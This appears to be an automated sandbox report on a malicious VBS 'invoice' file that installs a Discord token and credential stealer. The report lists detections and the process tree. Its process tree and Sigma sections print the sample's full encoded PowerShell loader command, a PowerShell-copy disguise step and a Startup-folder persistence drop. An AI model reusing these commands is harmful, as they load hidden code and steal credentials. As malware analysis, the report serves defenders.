Edit tour

Windows Analysis Report
Fattura-24SC-99245969925904728562.vbs

Overview

General Information

Sample name:	Fattura-24SC-99245969925904728562.vbs
Analysis ID:	1546109
MD5:	6f5153972552fdc27d794087d11c0f12
SHA1:	2392e3fb23d622dd6ef791b388bd0acadef3f069
SHA256:	577564ce2face042cce2f1f7f2a28c42a96d08b3929e63497da486fd90d295d0
Tags:	SPAM-ITAvbsuser-JAMESWT_MHT
Infos:

Detection

Discord Token Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious encrypted Powershell command line found

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected AntiVM3

Yara detected Discord Token Stealer

.NET source code contains potential unpacker

AI detected suspicious sample

Creates processes via WMI

Drops VBS files to the startup folder

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Powershell is started from unusual location (likely to bypass HIPS)

Reads the Security eventlog

Reads the System eventlog

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Sigma detected: PowerShell Script Run in AppData

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 7560 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

Fattura-24SC-99245969925904728562.vbs.exe (PID: 7764 cmdline: "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

InstallUtil.exe (PID: 7928 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cmd.exe (PID: 7636 cmdline: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wscript.exe (PID: 8168 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

wscript.exe (PID: 968 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cmd.exe (PID: 6964 cmdline: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

OSDescription.vbs.exe (PID: 6024 cmdline: "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

InstallUtil.exe (PID: 2980 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.1422431718.0000000009F60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.1617686351.0000000003324000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000007.00000002.1377378668.0000000005095000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1452651093.00000000023E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Fattura-24SC-99245969925904728562.vbs.exe PID: 7764	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Fattura-24SC-99245969925904728562.vbs.exe PID: 7764	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Fattura-24SC-99245969925904728562.vbs.exe PID: 7764	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x4408a8:$b2: ::FromBase64String( 0x2aa18:$s1: -join 0x3eb71b:$s1: -join 0x3f6df1:$s1: -join 0x4c9480:$s1: -join 0x4d6555:$s1: -join 0x4d9927:$s1: -join 0x4d9fd9:$s1: -join 0x4dbaca:$s1: -join 0x4ddcd0:$s1: -join 0x4de4f7:$s1: -join 0x4ded67:$s1: -join 0x4df4a2:$s1: -join 0x4df4d4:$s1: -join 0x4df51c:$s1: -join 0x4df53b:$s1: -join 0x4dfd8b:$s1: -join 0x4dff07:$s1: -join 0x4dff7f:$s1: -join 0x4e0012:$s1: -join 0x4e0278:$s1: -join
Process Memory Space: InstallUtil.exe PID: 7928	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 7928	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: InstallUtil.exe PID: 7928	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: OSDescription.vbs.exe PID: 6024	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: OSDescription.vbs.exe PID: 6024	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: OSDescription.vbs.exe PID: 6024	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x30b082:$b2: ::FromBase64String( 0x63a12:$s1: -join 0x70ae7:$s1: -join 0x73eb9:$s1: -join 0x7456b:$s1: -join 0x7605c:$s1: -join 0x78262:$s1: -join 0x78a89:$s1: -join 0x792f9:$s1: -join 0x79a34:$s1: -join 0x79a66:$s1: -join 0x79aae:$s1: -join 0x79acd:$s1: -join 0x7a31d:$s1: -join 0x7a499:$s1: -join 0x7a511:$s1: -join 0x7a5a4:$s1: -join 0x7a80a:$s1: -join 0x7c9a0:$s1: -join 0x8b3ea:$s1: -join 0xa0b32:$s1: -join
Process Memory Space: InstallUtil.exe PID: 2980	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 2980	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: InstallUtil.exe PID: 2980	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.InstallUtil.exe.23e0000.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
7.2.Fattura-24SC-99245969925904728562.vbs.exe.9f60000.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA, CommandLine: "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJw

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs", ProcessId: 7560, ProcessName: wscript.exe

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe, ProcessId: 7764, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05eouqb0.jr2.ps1

Sigma detected: PowerShell Script Run in AppData

Source: Process started

Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" /Y, CommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" /Y, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 968, ParentProcessName: wscript.exe, ProcessCommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" /Y, ProcessId: 6964, ProcessName: cmd.exe

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" /Y, CommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" /Y, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 968, ProcessCommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" /Y, ProcessId: 7636, ProcessName: cmd.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs", ProcessId: 7560, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe, ProcessId: 7764, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSDescription.vbs

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T14:16:23.610522+0100	2022930	1	A Network Trojan was detected	4.175.87.197	443	192.168.2.7	49740	TCP
2024-10-31T14:17:08.011978+0100	2022930	1	A Network Trojan was detected	20.12.23.50	443	192.168.2.7	49973	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Fattura-24SC-99245969925904728562.vbs

ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

